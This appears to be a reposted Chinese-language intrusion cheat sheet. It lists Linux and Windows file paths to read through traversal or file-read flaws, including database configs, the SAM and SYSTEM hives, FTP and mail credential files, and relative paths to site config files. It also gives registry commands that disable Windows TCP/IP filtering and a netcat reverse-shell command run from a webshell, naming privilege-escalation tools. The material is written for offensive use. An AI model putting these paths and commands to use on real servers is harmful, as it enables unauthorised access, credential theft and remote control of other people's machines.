/php4/php.ini /php/php.ini /PHP/php.ini /apache/php/php.ini /xampp/apache/bin/php.ini /xampp/apache/conf/httpd.conf /NetServer/bin/stable/apache/php.ini /home2/bin/stable/apache/php.ini /home/bin/stable/apache/php.ini /var/log/mysql/mysql-bin.log /var/log/mysql.log /var/log/mysqlderror.log /var/log/mysql/mysql.log /var/log/mysql/mysql-slow.log /var/mysql.log /var/lib/mysql/my.cnf /usr/local/mysql/my.cnf /usr/local/mysql/bin/mysql /etc/mysql/my.cnf /etc/my.cnf /usr/local/cpanel/logs /usr/local/cpanel/logs/stats_log /usr/local/cpanel/logs/access_log /usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log /usr/local/cpanel/logs/stats_log /usr/local/share/examples/php4/php.ini /usr/local/share/examples/php/php.ini /usr/local/tomcat5527/bin/version.sh /usr/share/tomcat6/bin/startup.sh /usr/tomcat6/bin/startup.sh
Windows 系统下的一些常见路径(可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘):
c:\windows\php.ini c:\boot.ini c:\1.txt c:\a.txt c:\CMailServer\config.ini c:\CMailServer\CMailServer.exe c:\CMailServer\WebMail\index.asp c:\program files\CMailServer\CMailServer.exe c:\program files\CMailServer\WebMail\index.asp C:\WinWebMail\SysInfo.ini C:\WinWebMail\Web\default.asp C:\WINDOWS\FreeHost32.dll C:\WINDOWS\7i24iislog4.exe C:\WINDOWS\7i24tool.exe c:\hzhost\databases\url.asp c:\hzhost\hzclient.exe C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk C:\WINDOWS\web.config c:\web\index.html c:\www\index.html c:\WWWROOT\index.html c:\website\index.html c:\web\index.asp c:\www\index.asp c:\wwwsite\index.asp c:\WWWROOT\index.asp c:\web\index.php c:\www\index.php c:\WWWROOT\index.php c:\WWWsite\index.php c:\web\default.html c:\www\default.html c:\WWWROOT\default.html c:\website\default.html c:\web\default.asp c:\www\default.asp c:\wwwsite\default.asp c:\WWWROOT\default.asp c:\web\default.php c:\www\default.php c:\WWWROOT\default.php c:\WWWsite\default.php C:\Inetpub\wwwroot\pagerror.gif c:\windows\notepad.exe c:\winnt\notepad.exe C:\Program Files\Microsoft Office\OFFICE10\winword.exe C:\Program Files\Microsoft Office\OFFICE11\winword.exe C:\Program Files\Microsoft Office\OFFICE12\winword.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files\winrar\rar.exe C:\Program Files\360\360Safe\360safe.exe C:\Program Files\360Safe\360safe.exe C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log c:\ravbin\store.ini c:\rising.ini C:\Program Files\Rising\Rav\RsTask.xml C:\Documents and Settings\All Users\Start Menu\desktop.ini C:\Documents and Settings\Administrator\My Documents\Default.rdp C:\Documents and Settings\Administrator\Cookies\index.dat C:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt C:\Documents and Settings\Administrator\My Documents\1.txt C:\Documents and Settings\Administrator\桌面\1.txt C:\Documents and Settings\Administrator\My Documents\a.txt C:\Documents and Settings\Administrator\桌面\a.txt C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm C:\Program Files\RhinoSoft.com\Serv-U\Version.txt C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini C:\Program Files\Symantec\SYMEVENT.INF C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini C:\MySQL\MySQL Server 5.0\my.ini C:\Program Files\MySQL\MySQL Server 5.0\my.ini C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm C:\Program Files\MySQL\MySQL Server 5.0\COPYING C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe c:\MySQL\MySQL Server 4.1\bin\mysql.exe c:\MySQL\MySQL Server 4.1\data\mysql\user.frm C:\Program Files\Oracle\oraconfig\Lpk.dll C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe C:\WINDOWS\system32\inetsrv\w3wp.exe C:\WINDOWS\system32\inetsrv\inetinfo.exe C:\WINDOWS\system32\inetsrv\MetaBase.xml C:\WINDOWS\system32\inetsrv\iisa, dmpwd\achg.asp C:\WINDOWS\system32\config\default.LOG C:\WINDOWS\system32\config\sam C:\WINDOWS\system32\config\system c:\CMailServer\config.ini c:\program files\CMailServer\config.ini c:\tomcat6\tomcat6\bin\version.sh c:\tomcat6\bin\version.sh c:\tomcat\bin\version.sh c:\program files\tomcat6\bin\version.sh C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log c:\Apache2\Apache2\bin\Apache.exe c:\Apache2\bin\Apache.exe c:\Apache2\php\license.txt C:\Program Files\Apache Group\Apache2\bin\Apache.exe c:\Program Files\QQ2007\qq.exe c:\Program Files\Tencent\, qq\User.db c:\Program Files\Tencent\qq\qq.exe c:\Program Files\Tencent\qq\bin\qq.exe c:\Program Files\Tencent\qq2009\qq.exe c:\Program Files\Tencent\qq2008\qq.exe c:\Program Files\Tencent\qq2010\bin\qq.exe c:\Program Files\Tencent\qq\Users\All Users\Registry.db C:\Program Files\Tencent\TM\TMDlls\QQZip.dll c:\Program Files\Tencent\Tm\Bin\Txplatform.exe c:\Program Files\Tencent\RTXServer\AppConfig.xml C:\Program Files\Foxmal\Foxmail.exe C:\Program Files\Foxmal\accounts.cfg C:\Program Files\tencent\Foxmal\Foxmail.exe C:\Program Files\tencent\Foxmal\accounts.cfg C:\Program Files\LeapFTP 3.0\LeapFTP.exe C:\Program Files\LeapFTP\LeapFTP.exe c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt C:\Program Files\FlashFXP\FlashFXP.ini C:\Program Files\FlashFXP\flashfxp.exe c:\Program Files\Oracle\bin\regsvr32.exe c:\Program Files\腾讯游戏\QQGAME\readme.txt c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt c:\Program Files\tencent\QQGAME\readme.txt C:\Program Files\StormII\Storm.exe
各种网站的配置文件相对路径大全:
/config.php ../../config.php ../config.php ../../../config.php /config.inc.php ./config.inc.php ../../config.inc.php ../config.inc.php ../../../config.inc.php /conn.php ./conn.php ../../conn.php ../conn.php ../../../conn.php /conn.asp ./conn.asp ../../conn.asp ../conn.asp ../../../conn.asp /config.inc.php ./config.inc.php ../../config.inc.php ../config.inc.php ../../../config.inc.php /config/config.php ../../config/config.php ../config/config.php ../../../config/config.php /config/config.inc.php ./config/config.inc.php ../../config/config.inc.php ../config/config.inc.php ../../../config/config.inc.php /config/conn.php ./config/conn.php ../../config/conn.php ../config/conn.php ../../../config/conn.php /config/conn.asp ./config/conn.asp ../../config/conn.asp ../config/conn.asp ../../../config/conn.asp /config/config.inc.php ./config/config.inc.php ../../config/config.inc.php ../config/config.inc.php ../../../config/config.inc.php /data/config.php ../../data/config.php ../data/config.php ../../../data/config.php /data/config.inc.php ./data/config.inc.php ../../data/config.inc.php ../data/config.inc.php ../../../data/config.inc.php /data/conn.php ./data/conn.php ../../data/conn.php ../data/conn.php ../../../data/conn.php /data/conn.asp ./data/conn.asp ../../data/conn.asp ../data/conn.asp ../../../data/conn.asp /data/config.inc.php ./data/config.inc.php ../../data/config.inc.php ../data/config.inc.php ../../../data/config.inc.php /include/config.php ../../include/config.php ../include/config.php ../../../include/config.php /include/config.inc.php ./include/config.inc.php ../../include/config.inc.php ../include/config.inc.php ../../../include/config.inc.php /include/conn.php ./include/conn.php ../../include/conn.php ../include/conn.php ../../../include/conn.php /include/conn.asp ./include/conn.asp ../../include/conn.asp ../include/conn.asp ../../../include/conn.asp /include/config.inc.php ./include/config.inc.php ../../include/config.inc.php ../include/config.inc.php ../../../include/config.inc.php /inc/config.php ../../inc/config.php ../inc/config.php ../../../inc/config.php /inc/config.inc.php ./inc/config.inc.php ../../inc/config.inc.php ../inc/config.inc.php ../../../inc/config.inc.php /inc/conn.php ./inc/conn.php ../../inc/conn.php ../inc/conn.php ../../../inc/conn.php /inc/conn.asp ./inc/conn.asp ../../inc/conn.asp ../inc/conn.asp ../../../inc/conn.asp /inc/config.inc.php ./inc/config.inc.php ../../inc/config.inc.php ../inc/config.inc.php ../../../inc/config.inc.php /index.php ./index.php ../../index.php ../index.php ../../../index.php /index.asp ./index.asp ../../index.asp ../index.asp ../../../index.asp
去除TCP IP筛选:
TCP/IP筛选在注册表里有三处,分别是:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
分别用以下命令来导出注册表项:
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
然后再把三个文件里的:
“EnableSecurityFilters"=dword:00000001”
改为:
“EnableSecurityFilters"=dword:00000000”
再将以上三个文件分别用以下命令导入注册表即可:
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg
Webshell 提权小技巧:
Cmd路径:c:\windows\temp\cmd.exe
Nc 也在同目录下,例如反弹cmdshell:
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
通常都不会成功。
而直接在 cmd 路径上输入:c:\windows\temp\nc.exe
命令输入:-vv ip 999 -e c:\windows\temp\cmd.exe
却能成功。。这个不是重点
我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。
--------------------------------------------------------------------------------------------------------------------------
EoF
原文连接:各种提权/渗透/经验/技巧总结
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
